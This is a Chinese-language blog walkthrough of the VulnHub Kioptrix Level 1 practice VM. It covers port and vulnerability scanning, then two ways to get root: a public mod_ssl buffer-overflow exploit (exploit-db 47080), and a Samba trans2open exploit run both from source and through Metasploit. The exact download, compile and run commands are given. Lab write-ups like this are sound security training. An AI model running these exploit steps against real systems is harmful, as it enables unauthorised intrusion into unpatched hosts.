Kioptrix: Level 1 (#1)

Kioptrix: Level 1 (#1)    https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Flag:Email

ifconfig
nmap -sn 192.168.0/24

本机IP:192.168.1.114   靶机IP:192.168.1.104

看一下开了哪些端口和服务

nmap 192.168.1.104 -O -sS -sV -v
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:46:21:38 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.013 days (since Mon May 11 22:17:03 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros

看下有哪些路径,并没有发现可利用的

dirb http://192.168.1.104/

扫描下有哪些漏洞

nikto -h 192.168.1.104

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

在https://www.exploit-db.com/中查询到了POC: https://www.exploit-db.com/exploits/47080

wget -O 47080.c https://www.exploit-db.com/download/47080

编译前准备

apt-get install libssl-dev

编译

gcc -o exp 47080.c -lcrypto

运行发现要找对应版本,Red-Hat/Linux  Apache/1.3.20

./exp
./exp | grep apache-1.3.20

符合的有两个0x6a、0x6b,实测0x6a不能用,0x6b可以

./exp 0x6a 192.168.1.104 -c 40

连上之后已经是root权限了

whoami
cat /etc/*-release
uname -a
mail
1
exit
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

方法二

在139端口运行着Samba,nmap没有给出版本号,用msfconsole模块查询

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.1.104
set threads 50
run

得到版本号为:Samba 2.2.1a

登录smb看下有哪些服务

smbclient -L 192.168.1.104 -N

 在https://www.exploit-db.com/查询 发现  Samba < 2.2.8 (Linux/BSD) - Remote Code Execution 符合

下载--编译--运行

wget -O t.c https://www.exploit-db.com/download/10
gcc -o tt t.c
./tt -b 0 192.168.1.104
whoami

也可以借助msfconsole 

msfconsole
search samba
use exploit/linux/samba/trans2open
options
set rhost 192.168.1.104
run

 

posted @ 2020-05-12 20:33  你认识小哀吗  阅读(814)  评论(0编辑  收藏  举报